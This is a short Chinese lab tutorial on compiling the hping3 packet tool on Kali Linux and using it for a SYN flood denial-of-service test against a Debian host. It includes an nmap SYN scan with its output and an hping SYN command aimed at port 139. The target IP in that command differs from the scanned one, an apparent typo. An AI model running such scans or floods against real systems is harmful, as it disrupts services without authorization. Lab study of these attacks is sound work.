hping3-synflood攻击
SYN Flood是一种广为人知的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。
攻击系统:KALI LINUX 192.168.2.66
被攻击系统:debain
操作步骤:
1、下载源码包:
wget http://www.hping.org/hping3-20051105.tar.gz
2、编译安装:
tar -zvxf hping3-20051105.tar.gz
cd hping3-20051105
./config
出现如下错误提示:
can not find the byte order for this architecture, fix bytesex.h
需要修改bytesex.h如下:
#ifndef ARS_BYTESEX_H
#define ARS_BYTESEX_H
#if defined(__i386__) \
|| defined(__x86_64__) \
|| defined(__alpha__) \
|| (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__)))
#define BYTE_ORDER_LITTLE_ENDIAN
#elif defined(__mc68000__) \
|| defined (__sparc__) \
|| defined (__sparc) \
|| defined (__PPC__) \
|| defined (__BIG_ENDIAN__) \
|| (defined(__mips__) && (defined(MIPSEB) || defined (__MIPSEB__)))
#define BYTE_ORDER_BIG_ENDIAN
#else
# error can not find the byte order for this architecture, fix bytesex.h
#endif
#endif /* ARS_BYTESEX_H */
3、再次编译,./config
提示没有pcap.h,安装libpcap-dev:apt-get install libpcap-dev,运行make, 提示没有头文件net/bpf.h,拒绝办法:ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h
运行make,出现问题:/usr/bin/ld: cannot find -ltcl,解决办法:apt-get insatll tcl-dev
之后根据提示进行如下三步操作:
1)make strip
2)./hping 3
3) make install
cp -f hping3 /usr/sbin/
chmod 755 /usr/sbin/hping3
ln -s /usr/sbin/hping3 /usr/sbin/hping
ln -s /usr/sbin/hping3 /usr/sbin/hping2
@@@@@@ WARNING @@@@@@
Can't install the man page: /usr/local/man/man8 does not exist
4、扫描端口
在kali linux终端运行:nmap -sS -Pn 192.168.2.166
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-11-24 23:06 CST
Nmap scan report for 192.168.2.166
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
6000/tcp open X11
MAC Address: B8:AE:ED:96:4C:5C (Elitegroup Computer Systems Co.)
Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds
5、 攻击测试
hping 182.168.2.166 -p 139 -S
预期结果在攻击主机查看:
sudo tcpdump dst 192.168.2.66